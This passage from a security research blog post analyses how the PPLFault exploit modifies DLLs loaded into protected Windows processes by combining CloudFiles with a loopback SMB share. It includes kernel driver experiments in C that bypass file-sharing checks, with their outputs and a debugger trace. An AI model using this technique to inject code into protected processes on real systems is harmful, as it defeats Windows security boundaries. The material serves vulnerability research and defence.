<p>When the driver needs to rehydrate a file, it invokes a <a href="https://learn.microsoft.com/en-us/windows/win32/api/cfapi/ns-cfapi-cf_callback_registration">rehydration callback</a> in the provider’s process (i.e. <code>OneDrive.exe</code>). That callback retrieves the file’s contents (potentially from the cloud) and calls <code>CfExecute</code> to give those contents to the driver, which the driver then writes to the file. CloudFiles will only request rehydration of file regions that aren’t currently hydrated, but it’s possible to <a href="https://learn.microsoft.com/en-us/previous-versions/mt827480(v=vs.85)">dehydrate</a> files to free up space on the current system.</p>
<h2>Exploit development</h2>
<p>By default, Windows allows for the sharing of files and folders over the network using the Server Message Block (SMB) protocol. If you’ve ever connected to a shared network drive on a corporate network, there’s a good chance that it used SMB. Windows includes both an SMB client and server by default. The client component provides a network redirector, as described above, enabling transparent SMB access to files via any API that accepts file paths. For example, you can run Process Monitor over the internet right now by running <code>\\live.sysinternals.com\Procmon.exe</code>.</p>
<p>We released the <a href="https://github.com/gabriellandau/PPLFault">PPLFault exploit</a> in May 2023 alongside our <a href="https://www.blackhat.com/asia-23/briefings/schedule/#ppldump-is-dead-long-live-ppldump-31052">Black Hat Asia talk</a>. PPLFault leverages a network redirector to exploit FFI in DLLs loaded into Protected Process Light (PPL) processes. The initial prototype required a second attacker-controlled machine running a malicious SMB server. By disabling Windows’ built-in SMB server, we were able to move the malicious SMB server to the local machine, removing the requirement for a second machine (<a href="https://github.com/gabriellandau/PPLFault/tree/main/python">prototype</a>).</p>
<p>This was still messier than we would like, however, because at the time we <a href="https://www.x33fcon.com/slides/x33fcon24_-_Nick_Powers_-_Relay_Your_Heart_Away_An_OPSEC-Conscious_Approach_to_445_Takeover.pdf">incorrectly</a> believed that stopping the Windows built-in SMB server required a reboot. Fortunately, we discovered James Forshaw’s technique of <a href="https://googleprojectzero.blogspot.com/2021/01/windows-exploitation-tricks-trapping.html">combining the CloudFiles provider with the loopback (localhost) SMB adapter</a>, enabling us to create the final reboot-less exploit. Besides being streamlined, the CloudFiles/SMB pairing is distinct from the prior two exploit versions in that it uses the regular Windows SMB server, which should honor file sharing (i.e. <code>FILE_SHARE_*</code>) semantics. For example, while an SMB client has a file open on a server without <code>FILE_SHARE_WRITE</code>, the server shouldn’t allow another client to open that file for write access. Similarly, the server shouldn’t allow write access to any executables running locally on the server.</p>
<p>We seem to have a contradiction. If PPLFault has to abide by file sharing restrictions, then how is it injecting code into a running DLL?  Let’s see what <a href="https://learn.microsoft.com/en-us/sysinternals/downloads/procmon">Process Monitor</a> can tell us. Running PPLFault under Process Monitor shows the following three operations (filtered for illustrative purposes). This analysis was done with <a href="https://www.virustotal.com/gui/file/69ae0580eacf97afc52d87e74118571d18cfd266d00a7d579d5419720c5713da">version 10.0.22621.2861</a> of <code>cldflt.sys</code> on Windows 11 22631.2861.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/immutable-illusion/image4.png" alt="" /></p>
<p>In order, the operations are:</p>
<ol>
<li>The victim process, <code>services.exe</code>, loads a DLL as an executable image.</li>
<li>After it’s loaded, <code>PPLFault.exe</code> opens it.</li>
<li>After it’s opened, <code>PPLFault.exe</code> writes to it.</li>
</ol>
<p>There are a few key observations to make here:</p>
<p><strong>Violation of Immutability</strong><br />
We see a successful write operation to a file while it is loaded as an executable image. In our <a href="https://www.elastic.co/kr/security-labs/false-file-immutability">earlier FFI research</a>, we discussed the <code>MmFlushImageSection</code> check in the file system, which is designed to protect against this very situation. <em>How did it bypass this check?</em></p>
<p><strong>Violation of the File Access Model</strong><br />
We can see that PPLFault successfully overwrote the file. Microsoft documentation for WriteFile <a href="https://learn.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-writefile">states</a> that the file should have been opened with write access, meaning <a href="https://learn.microsoft.com/en-us/windows/win32/fileio/file-access-rights-constants"><code>FILE_WRITE_DATA</code></a>, but the output shows it was opened for “Read Attributes, Write Attributes, Synchronize,” which is <code>FILE_READ_ATTRIBUTES</code>, <code>FILE_WRITE_ATTRIBUTES</code>, and <code>SYNCHRONIZE</code>. <em>Without <code>FILE_WRITE_DATA</code>, how did it overwrite this file?</em></p>
<p>Let’s try to answer these two questions in the next section.</p>
<blockquote>
<p>📘 Nerd Bonus -</p>
<p>Process Monitor installs a <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ifs/filter-manager-concepts">filesystem minifilter driver</a> to intercept and log I/O activity on the system. Windows encapsulates I/O actions in structures called <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/gettingstarted/i-o-request-packets">I/O Request Packets</a> (IRPs). Each minifilter is <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ifs/allocated-altitudes">assigned</a> an “altitude,” which you can think of as floors in a building. Most IRPs start at the top floor and travel down the stack. If a minifilter issues its own I/O, that IRP starts at its altitude and travels downwards from there. In other words, a minifilter on the sixth floor will never see I/O from the fifth floor. Process Monitor’s minifilter driver runs at altitude <code>385200</code>. Normally, it will never see the activity of <code>cldflt.sys</code>, which runs at altitude <code>180451</code>. Fortunately, we can adjust Process Monitor’s altitude with the <a href="https://x.com/GabrielLandau/status/1651685087769948170">/altitude switch</a>, placing it below CloudFiles at altitude <code>180450</code>.</p>
</blockquote>
<h2>Rules for thee, but not for me</h2>
<p>As discussed, applications are subject to file sharing restrictions, but the kernel itself isn’t always restricted in the same way. For example, kernel drivers can use <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntddk/nf-ntddk-iocreatefileex">IoCreateFileEx</a> to open or create files.</p>
<pre><code class="language-c">NTSTATUS IoCreateFileEx(
  [out]          PHANDLE                   FileHandle,
  [in]           ACCESS_MASK               DesiredAccess,
  [in]           POBJECT_ATTRIBUTES        ObjectAttributes,
  [out]          PIO_STATUS_BLOCK          IoStatusBlock,
  [in, optional] PLARGE_INTEGER            AllocationSize,
  [in]           ULONG                     FileAttributes,
  [in]           ULONG                     ShareAccess,
  [in]           ULONG                     Disposition,
  [in]           ULONG                     CreateOptions,
  [in, optional] PVOID                     EaBuffer,
  [in]           ULONG                     EaLength,
  [in]           CREATE_FILE_TYPE          CreateFileType,
  [in, optional] PVOID                     InternalParameters,
  [in]           ULONG                     Options,
  [in, optional] PIO_DRIVER_CREATE_CONTEXT DriverContext
);
</code></pre>
<p><code>IoCreateFileEx</code> looks very similar to the user-facing function <code>NtCreateFile</code>, but its documentation describes some important additional capabilities, including its <code>Options</code> parameter, which supports a flag:</p>
<blockquote>
<p>IO_IGNORE_SHARE_ACCESS_CHECK<br />
The I/O manager should not perform share-access checks on the file object after it is created. However, the file system might still perform these checks.</p>
</blockquote>
<p>Is it that simple?  Can a kernel driver use <code>IoCreateFileEx(IO_IGNORE_SHARE_ACCESS_CHECK)</code> to open an in-use DLL for write access?  Let’s write a kernel driver to try it out. The code in this article is available as a Visual Studio project on GitHub <a href="https://github.com/gabriellandau/BlogExamples/tree/main/Redux/FileTestDriver">here</a>.</p>
<pre><code class="language-c">/*
* This experiment shows that a file opened without FILE_SHARE_WRITE 
* can't be modified unless IO_IGNORE_SHARE_ACCESS_CHECK is used.
*/
VOID ExperimentOne()
{
    DECLARE_CONST_UNICODE_STRING(filePath, L&quot;\\??\\C:\\TestFile.bin&quot;);

    NTSTATUS ntStatus = STATUS_SUCCESS;
    HANDLE hFile = NULL;
    HANDLE hFile2 = NULL;
    OBJECT_ATTRIBUTES objAttr{};
    IO_STATUS_BLOCK iosb{};
    BOOLEAN bSuccessful = FALSE;
    BOOLEAN bReportResults = FALSE;

    InitializeObjectAttributes(&amp;objAttr, (PUNICODE_STRING)&amp;filePath, 
        OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, NULL, NULL);

    // Create a file without FILE_SHARE_WRITE
    // This mimics ntdll!LdrpMapDllNtFileName
    ntStatus = ZwCreateFile(
        &amp;hFile,
        FILE_READ_DATA | FILE_EXECUTE | SYNCHRONIZE,
        &amp;objAttr, &amp;iosb, NULL, FILE_ATTRIBUTE_NORMAL,
        FILE_SHARE_READ | FILE_SHARE_DELETE,
        FILE_OPEN_IF,
        FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE,
        NULL, 0);
    if (!NT_SUCCESS(ntStatus))
    {
        DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, 
            &quot;ExperimentOne: ZwCreateFile %wZ failed with NTSTATUS 0x%08x\n&quot;, 
            &amp;filePath, ntStatus);
        goto Cleanup;
    }

    bReportResults = TRUE;

    // IoCreateFileEx without IO_IGNORE_SHARE_ACCESS_CHECK should not be able to open the file
    ntStatus = IoCreateFileEx(
        &amp;hFile2,
        FILE_WRITE_DATA | SYNCHRONIZE,
        &amp;objAttr, &amp;iosb, NULL, FILE_ATTRIBUTE_NORMAL,
        FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
        FILE_OPEN,
        FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE,
        NULL, 0, CreateFileTypeNone, NULL,
        0,
        NULL);
    if (NT_SUCCESS(ntStatus))
    {
        DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL,
            &quot;ExperimentOne: IoCreateFileEx(FILE_WRITE_DATA) unexpectedly &quot;
            &quot;succeeded on a write-sharing-denied file\n&quot;);
        ntStatus = STATUS_UNSUCCESSFUL;
        goto Cleanup;
    }

    // Can IoCreateFileEx(IO_IGNORE_SHARE_ACCESS_CHECK) open a 
    // write-sharing-denied file for write access?
    ntStatus = IoCreateFileEx(
        &amp;hFile2,
        FILE_WRITE_DATA | SYNCHRONIZE,
        &amp;objAttr, &amp;iosb, NULL, FILE_ATTRIBUTE_NORMAL,
        FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
        FILE_OPEN,
        FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE,
        NULL, 0, CreateFileTypeNone, NULL,
        IO_IGNORE_SHARE_ACCESS_CHECK,
        NULL);
    bSuccessful = NT_SUCCESS(ntStatus);

Cleanup:
    if (bReportResults)
    {
        DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL,
            &quot;ExperimentOne complete. &quot;
            &quot;IoCreateFileEx(IO_IGNORE_SHARE_ACCESS_CHECK) %s open a &quot;
            &quot;write-sharing-denied file for FILE_WRITE_DATA. &quot;
            &quot;Status: 0x%08x\n&quot;,
            bSuccessful ? &quot;CAN&quot; : &quot;CANNOT&quot;,
            ntStatus);
    }

    HandleDelete(hFile);
    HandleDelete(hFile2);
}
</code></pre>
<p>Loading it in a VM with <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/install/test-signing">test signing</a> enabled yields the following output:</p>
<pre><code class="language-c">ExperimentOne complete. IoCreateFileEx(IO_IGNORE_SHARE_ACCESS_CHECK) CAN open a write-sharing-denied file for FILE_WRITE_DATA. Status: 0x00000000
</code></pre>
<p>Did we just come up with a plausible explanation for how PPLFault can modify “immutable” files?  Not quite. This experiment was a bit of an oversimplification, but it shows <code>IO_IGNORE_SHARE_ACCESS_CHECK</code> in action, proving that kernel APIs can provide more freedom than their user-mode counterparts.</p>
<p>In PPLFault, CloudFiles isn’t just modifying a file with write-sharing-denied handles. Rather, it’s modifying a DLL while it’s mapped in memory as an executable image. Let’s try another experiment that’s a little closer to the PPLFault scenario. In experiment two, we will emulate <a href="https://learn.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibraryw"><code>LoadLibrary</code></a> by opening a DLL, creating a <code>SEC_IMAGE</code> section, and then mapping a view of that section into memory. Once the view is mapped, we will close the handles and test whether <code>IoCreateFileEx(IO_IGNORE_SHARE_ACCESS_CHECK)</code> can get a writable handle.</p>
<p>Let’s start with a helper function that maps a PE as an image section, similar to <code>LoadLibrary</code>. We’ll do this in the kernel to keep the experiment in a single driver, but note that it’s functionally equivalent to <code>LoadLibrary</code> for our purposes.</p>
<pre><code class="language-c">// Emulate a portion of LoadLibrary
NTSTATUS MapFileAsImageSection(
    PCUNICODE_STRING pPath,
    HANDLE* phFile,
    HANDLE* phSection,
    PVOID* ppMappedBase
)
{
    NTSTATUS ntStatus = STATUS_SUCCESS;
    HANDLE hFile = NULL;
    HANDLE hSection = NULL;
    PVOID pMappedBase = NULL;
    SIZE_T viewSize = 0;
    OBJECT_ATTRIBUTES objAttr{};
    IO_STATUS_BLOCK iosb{};

    InitializeObjectAttributes(&amp;objAttr, (PUNICODE_STRING)pPath,
        OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, NULL, NULL);

    // From ntdll!LdrpMapDllNtFileName
    // NtOpenFile(&amp;FileHandle, 0x100021u, &amp;ObjectAttributes, &amp;IoStatusBlock, 5u, 0x60u);
    ntStatus = ZwOpenFile(
        &amp;hFile,
        FILE_READ_DATA | FILE_EXECUTE | SYNCHRONIZE,
        &amp;objAttr, &amp;iosb,
        FILE_SHARE_READ | FILE_SHARE_DELETE,
        FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE);
    if (!NT_SUCCESS(ntStatus))
    {
        DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL,
            &quot;MapFileAsImageSection: ZwOpenFile %wZ failed with NTSTATUS 0x%08x\n&quot;,
            pPath, ntStatus);
        goto Cleanup;
    }

    InitializeObjectAttributes(&amp;objAttr, NULL, OBJ_KERNEL_HANDLE, NULL, NULL);

    // From ntdll!LdrpMapDllNtFileName
    // NtCreateSection(&amp;Handle, 0xDu, 0LL, 0LL, 0x10u, v18, FileHandle);
    ntStatus = ZwCreateSection(&amp;hSection,
        SECTION_QUERY | SECTION_MAP_READ | SECTION_MAP_EXECUTE,
        &amp;objAttr, NULL, PAGE_EXECUTE, SEC_IMAGE, hFile
    );
    if (!NT_SUCCESS(ntStatus))
    {
        DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL,
            &quot;MapFileAsImageSection: ZwCreateSection %wZ failed with NTSTATUS 0x%08x\n&quot;,
            pPath, ntStatus);
        goto Cleanup;
    }

    // From ntdll!LdrpMinimalMapModule
    // Map a view of this SEC_IMAGE section into the lower half of the System process address space
    ntStatus = ZwMapViewOfSection(
        hSection, ZwCurrentProcess(), &amp;pMappedBase, 0, 0, NULL,
        &amp;viewSize, ViewShare, 0, PAGE_EXECUTE_WRITECOPY);
    if (!NT_SUCCESS(ntStatus))
    {
        DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL,
            &quot;MapFileAsImageSection: ZwMapViewOfSection %wZ failed with NTSTATUS 0x%08x\n&quot;,
            pPath, ntStatus);
        goto Cleanup;
    }

    // Move ownership to output parameters and prevent cleanup
    *ppMappedBase = pMappedBase;
    pMappedBase = NULL;

    *phFile = hFile;
    hFile = NULL;

    *phSection = hSection;
    hSection = NULL;

Cleanup:
    HandleDelete(hFile);
    HandleDelete(hSection);
    if (pMappedBase)
    {
        NTSTATUS unmapStatus = ZwUnmapViewOfSection(ZwCurrentProcess(), pMappedBase);
        NT_ASSERT(NT_SUCCESS(unmapStatus));
    }

    return ntStatus;
}
</code></pre>
<p>Now let’s use that helper to map a DLL, then see if we can write to it with <code>IO_IGNORE_SHARE_ACCESS_CHECK</code>:</p>
<pre><code class="language-c">/*
* This experiment shows that a file opened without FILE_SHARE_WRITE can't be 
* modified even if IO_IGNORE_SHARE_ACCESS_CHECK is used because the file has 
* an associated active SEC_IMAGE section.
*/
VOID ExperimentTwo()
{
    DECLARE_CONST_UNICODE_STRING(filePath, L&quot;\\SystemRoot\\System32\\TestDll.dll&quot;);

    NTSTATUS ntStatus = STATUS_SUCCESS;
    HANDLE hFile = NULL;
    HANDLE hSection = NULL;
    HANDLE hFile2 = NULL;
    OBJECT_ATTRIBUTES fileObjAttr{};
    OBJECT_ATTRIBUTES sectionObjAttr{};
    IO_STATUS_BLOCK iosb{};
    BOOLEAN bSuccessful = FALSE;
    BOOLEAN bReportResults = FALSE;
    PVOID pMappedBase = NULL;
    PFILE_OBJECT pFileObject = NULL;

    ntStatus = MapFileAsImageSection(
        &amp;filePath, &amp;hFile, &amp;hSection, &amp;pMappedBase);
    if (!NT_SUCCESS(ntStatus))
    {
        DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL,
            &quot;ExperimentTwo: MapFileAsImageSection %wZ failed with NTSTATUS 0x%08x\n&quot;,
            &amp;filePath, ntStatus);
        goto Cleanup;
    }

    // MmFlushImageSection should return FALSE. This is what fails the FILE_WRITE_DATA request below.
    // MmFlushImageSection requires SECTION_OBJECT_POINTERS, which we can get from the FILE_OBJECT.
    ntStatus = ObReferenceObjectByHandle(hFile, 0, *IoFileObjectType, KernelMode, (PVOID*)&amp;pFileObject, NULL);
    if (!NT_SUCCESS(ntStatus))
    {
        DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL,
            &quot;ExperimentTwo: ObReferenceObjectByHandle %wZ failed with NTSTATUS 0x%08x\n&quot;,
            &amp;filePath, ntStatus);
        goto Cleanup;
    }

    if (MmFlushImageSection(pFileObject-&gt;SectionObjectPointer, MmFlushForWrite))
    {
        DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL,
            &quot;ExperimentTwo: MmFlushImageSection unexpectedly succeeded %wZ\n&quot;,
            &amp;filePath);
        goto Cleanup;
    }

    // Now that a view of the SEC_IMAGE mapping exists, close the file and section handles to remove them from the equation
    // We're trying to test whether IO_IGNORE_SHARE_ACCESS_CHECK can bypass the MmFlushImageSection check here:
    // https://github.com/Microsoft/Windows-driver-samples/blob/622212c3fff587f23f6490a9da939fb85968f651/filesys/fastfat/create.c#L3572-L3593
    ReferenceDelete(pFileObject);
    HandleDelete(hFile);
    HandleDelete(hSection);

    InitializeObjectAttributes(&amp;fileObjAttr, (PUNICODE_STRING)&amp;filePath, OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, NULL, NULL);

    // Can IoCreateFileEx(IO_IGNORE_SHARE_ACCESS_CHECK) open a file mapped as SEC_IMAGE for write access?
    ntStatus = IoCreateFileEx(
        &amp;hFile2,
        FILE_WRITE_DATA | SYNCHRONIZE,
        &amp;fileObjAttr, &amp;iosb, NULL, FILE_ATTRIBUTE_NORMAL,
        FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
        FILE_OPEN,
        FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE,
        NULL, 0, CreateFileTypeNone, NULL,
        IO_IGNORE_SHARE_ACCESS_CHECK,
        NULL);

    bSuccessful = NT_SUCCESS(ntStatus);
    bReportResults = TRUE;

Cleanup:
    if (bReportResults)
    {
        DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL,
            &quot;ExperimentTwo complete. &quot;
            &quot;IoCreateFileEx(IO_IGNORE_SHARE_ACCESS_CHECK) %s open a &quot;
            &quot;file backing a local SEC_IMAGE section for FILE_WRITE_DATA. &quot;
            &quot;Status: 0x%08x\n&quot;,
            bSuccessful ? &quot;CAN&quot; : &quot;CANNOT&quot;,
            ntStatus);
    }

    HandleDelete(hFile);
    HandleDelete(hSection);
    HandleDelete(hFile2);
    ReferenceDelete(pFileObject);
    if (pMappedBase)
    {
        NTSTATUS unmapStatus = ZwUnmapViewOfSection(ZwCurrentProcess(), pMappedBase);
        NT_ASSERT(NT_SUCCESS(unmapStatus));
    }
}
</code></pre>
<p>Running this experiment yields the following output:</p>
<pre><code class="language-c">ExperimentTwo complete. IoCreateFileEx(IO_IGNORE_SHARE_ACCESS_CHECK) CANNOT open a file backing a local SEC_IMAGE section for FILE_WRITE_DATA. Status: 0xc0000043
</code></pre>
<p>In this case, <code>IoCreateFileEx</code> failed with <code>0xC0000043</code> (<code>STATUS_SHARING_VIOLATION</code>) because files mapped as executable images have additional protections to ensure they remain immutable, even without any open handles. You can see this check using the <code>MmFlushImageSection</code> API in the <a href="https://github.com/Microsoft/Windows-driver-samples/blob/622212c3fff587f23f6490a9da939fb85968f651/filesys/fastfat/create.c#L3572-L3593">Microsoft FastFat sample driver code</a>, but it exists in other file systems as well, including NTFS:</p>
<pre><code class="language-c">//
//  If the user wants write access access to the file make sure there
//  is not a process mapping this file as an image.  [ ... ]
//
if (FlagOn(*DesiredAccess, FILE_WRITE_DATA) || DeleteOnClose) {

    [ ... ] 
    
    if (!MmFlushImageSection( &amp;Fcb-&gt;NonPaged-&gt;SectionObjectPointers,
                              MmFlushForWrite )) {

        Iosb.Status = DeleteOnClose ? STATUS_CANNOT_DELETE :
                                      STATUS_SHARING_VIOLATION;
        try_return( Iosb );
    }
}
</code></pre>
<p>The <code>IO_IGNORE_SHARE_ACCESS_CHECK</code> flag bypasses I/O manager checks, but not the <code>MmFlushImageSection</code> check in the filesystem. Re-reading the description of <code>IO_IGNORE_SHARE_ACCESS_CHECK</code>, it’s obvious in hindsight:</p>
<blockquote>
<p>IO_IGNORE_SHARE_ACCESS_CHECK<br />
The I/O manager should not perform share-access checks on the file object after it is created. <em>However, the file system might still perform these checks.</em></p>
</blockquote>
<p>ExperimentTwo isn’t exactly a fair representation of PPLFault, which loads the DLL from a network drive. When a network client opens a file on a server, the SMB client driver allocates a File Control Block (<a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ifs/the-fcb-structure">FCB</a>) structure representing that logical file. Correspondingly, the server opens the file with the requested share modes and allocates its own FCB. This means that there are two distinct FCBs in play with different semantics. When the client maps a DLL into memory as an executable, the resulting <code>SEC_IMAGE</code> file mapping (aka section) is associated with its FCB, so it gains the protection of <code>MmFlushImageSection</code>. The server does not correspondingly create an image section, so its FCB gains no such protection. PPLFault exploits this difference by performing its writes against the server’s FCB, bypassing the <code>MmFlushImageSection</code> check.</p>
<p>Let’s try this out in ExperimentThree:</p>
<pre><code class="language-c">/*
* This experiment shows that a file loaded as a DLL by an SMB client can't be modified
* server-side unless IO_IGNORE_SHARE_ACCESS_CHECK is used.
*/
VOID ExperimentThree()
{
    DECLARE_CONST_UNICODE_STRING(filePathLocal, 
        L&quot;\\SystemRoot\\System32\\TestDll.dll&quot;);
    DECLARE_CONST_UNICODE_STRING(filePathSMB, 
        L&quot;\\Device\\Mup\\127.0.0.1\\c$\\Windows\\System32\\TestDll.dll&quot;);

    NTSTATUS ntStatus = STATUS_SUCCESS;
    HANDLE hFile = NULL;
    HANDLE hSection = NULL;
    HANDLE hFile2 = NULL;
    OBJECT_ATTRIBUTES fileObjAttr{};
    OBJECT_ATTRIBUTES sectionObjAttr{};
    IO_STATUS_BLOCK iosb{};
    BOOLEAN bSuccessful = FALSE;
    BOOLEAN bReportResults = FALSE;
    PVOID pMappedBase = NULL;

    ntStatus = MapFileAsImageSection(
        &amp;filePathSMB, &amp;hFile, &amp;hSection, &amp;pMappedBase);
    if (!NT_SUCCESS(ntStatus))
    {
        DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL,
            &quot;ExperimentThree: MapFileAsImageSection %wZ failed with NTSTATUS 0x%08x\n&quot;,
            &amp;filePathSMB, ntStatus);
        goto Cleanup;
    }

    // Now that a view of the SEC_IMAGE mapping exists, 
    // close the file and section handles to remove them from the equation.
    // We're trying to test whether IO_IGNORE_SHARE_ACCESS_CHECK can bypass the 
    // MmFlushImageSection check here:
    // https://github.com/Microsoft/Windows-driver-samples/blob/622212c3fff587f23f6490a9da939fb85968f651/filesys/fastfat/create.c#L3572-L3593
    HandleDelete(hFile);
    HandleDelete(hSection);

    InitializeObjectAttributes(&amp;fileObjAttr, 
        (PUNICODE_STRING)&amp;filePathLocal, OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, NULL, NULL);

    bReportResults = TRUE;

    // Can IoCreateFileEx() open a file mapped as SEC_IMAGE for write access?
    ntStatus = IoCreateFileEx(
        &amp;hFile2,
        FILE_WRITE_DATA | SYNCHRONIZE,
        &amp;fileObjAttr, &amp;iosb, NULL, FILE_ATTRIBUTE_NORMAL,
        FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
        FILE_OPEN,
        FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE,
        NULL, 0, CreateFileTypeNone, NULL,
        0,
        NULL);
    if (NT_SUCCESS(ntStatus))
    {
        DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL,
            &quot;ExperimentThree: IoCreateFileEx(FILE_WRITE_DATA) unexpectedly succeeded &quot;
            &quot;on a file mapped as SEC_IMAGE remotely by an SMB client\n&quot;);
        ntStatus = STATUS_UNSUCCESSFUL;
        goto Cleanup;
    }

    // Can IoCreateFileEx(IO_IGNORE_SHARE_ACCESS_CHECK) open
    // a file mapped as SEC_IMAGE for write access?
    ntStatus = IoCreateFileEx(
        &amp;hFile2,
        FILE_WRITE_DATA | SYNCHRONIZE,
        &amp;fileObjAttr, &amp;iosb, NULL, FILE_ATTRIBUTE_NORMAL,
        FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
        FILE_OPEN,
        FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE,
        NULL, 0, CreateFileTypeNone, NULL,
        IO_IGNORE_SHARE_ACCESS_CHECK,
        NULL);

    bSuccessful = NT_SUCCESS(ntStatus);
    bReportResults = TRUE;

Cleanup:
    if (bReportResults)
    {
        DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL,
            &quot;ExperimentThree complete. &quot;
            &quot;IoCreateFileEx(IO_IGNORE_SHARE_ACCESS_CHECK) %s open a &quot;
            &quot;file backing a remote SEC_IMAGE view for FILE_WRITE_DATA. &quot;
            &quot;Status: 0x%08x\n&quot;,
            bSuccessful ? &quot;CAN&quot; : &quot;CANNOT&quot;,
            ntStatus);
    }

    HandleDelete(hFile);
    HandleDelete(hSection);
    HandleDelete(hFile2);
    if (pMappedBase)
    {
        NTSTATUS unmapStatus = ZwUnmapViewOfSection(ZwCurrentProcess(), pMappedBase);
        NT_ASSERT(NT_SUCCESS(unmapStatus));
    }
}
</code></pre>
<p>ExperimentThree generates the following output:</p>
<pre><code class="language-c">ExperimentThree complete. IoCreateFileEx(IO_IGNORE_SHARE_ACCESS_CHECK) CAN open a file backing a remote SEC_IMAGE view for FILE_WRITE_DATA. Status: 0x00000000
</code></pre>
<p>ExperimentThree shows that a kernel driver can modify a DLL mapped by an SMB client by using the <code>IO_IGNORE_SHARE_ACCESS_CHECK</code> flag against the server’s copy of that file.</p>
<h2>Roll up your sleeves</h2>
<p>We’ve just shown what’s possible, but we still don’t know what CloudFiles is actually doing. Let’s dig deeper into the Process Monitor output to answer the questions raised earlier.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/immutable-illusion/image4.png" alt="" /></p>
<p>Earlier, we asked two questions:</p>
<blockquote>
<p><strong>Violation of Immutability</strong><br />
We see a successful write operation to a file while it is loaded as an executable image. In our <a href="https://www.elastic.co/kr/security-labs/false-file-immutability">earlier FFI research</a>, we discussed the <code>MmFlushImageSection</code> check in the file system, which is designed to protect against this very situation. <em>How did it bypass this check?</em></p>
<p><strong>Violation of the File Access Model</strong><br />
We can see that PPLFault successfully overwrote the file. Microsoft documentation for WriteFile <a href="https://learn.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-writefile">states</a> that the file should have been opened with write access, meaning <a href="https://learn.microsoft.com/en-us/windows/win32/fileio/file-access-rights-constants"><code>FILE_WRITE_DATA</code></a>, but the output shows it was opened for “Read Attributes, Write Attributes, Synchronize,” which is <code>FILE_READ_ATTRIBUTES</code>, <code>FILE_WRITE_ATTRIBUTES</code>, and <code>SYNCHRONIZE</code>. <em>Without <code>FILE_WRITE_DATA</code>, how did it overwrite this file?</em></p>
</blockquote>
<p>We can easily explain the <code>MmFlushImageSection</code> bypass. That check <a href="https://github.com/microsoft/Windows-driver-samples/blob/9607307c5bfcc68ca9f0acdfcc2f0c8c2584897d/filesys/fastfat/create.c#L3581">looks for</a> <code>FILE_WRITE_DATA</code>, which wasn’t used here. The file was only opened for “Read Attributes, Write Attributes, Synchronize.”  We can’t yet explain the violation of the file access model, however. How did it overwrite a non-writable file?  Let’s zoom in on the call stack for that <code>WriteFile</code> operation to find out.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/immutable-illusion/image3.png" alt="Call stack for PPLFault file write operation" title="Call stack for PPLFault file write operation" /></p>
<p>In the call stack, we can see <a href="https://github.com/gabriellandau/PPLFault/blob/c835f98faf596ab9f2ceb362b30a79a1b4808888/PPLFault/PPLFault.cpp#L176">line 176 of <code>PPLFault.cpp</code></a> calling <a href="https://learn.microsoft.com/en-us/windows/win32/api/cfapi/nf-cfapi-cfexecute"><code>cldapi.dll!CfExecute</code></a> (rows 24-25) from user-mode. This eventually results in <code>cldflt.sys!HsmiRecallWriteFileNoLock</code> calling <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/fltkernel/nf-fltkernel-fltwritefileex"><code>FltWriteFileEx</code></a>. <code>FltWriteFileEx</code> is somehow able to write to a file that’s not opened for write access. Let’s attach a kernel debugger and take a closer look.</p>
<p>Setting a breakpoint on <code>FltWriteFileEx</code> and re-running the exploit, we can break at the call from <code>HsmiRecallWriteFileNoLock</code>:</p>
<pre><code class="language-shell">2: kd&gt; bp fltmgr!FltWriteFileEx
2: kd&gt; g
Breakpoint 0 hit
FLTMGR!FltWriteFileEx:
fffff800`425aad40 4055            push    rbp
0: kd&gt; k
 # Child-SP          RetAddr               Call Site
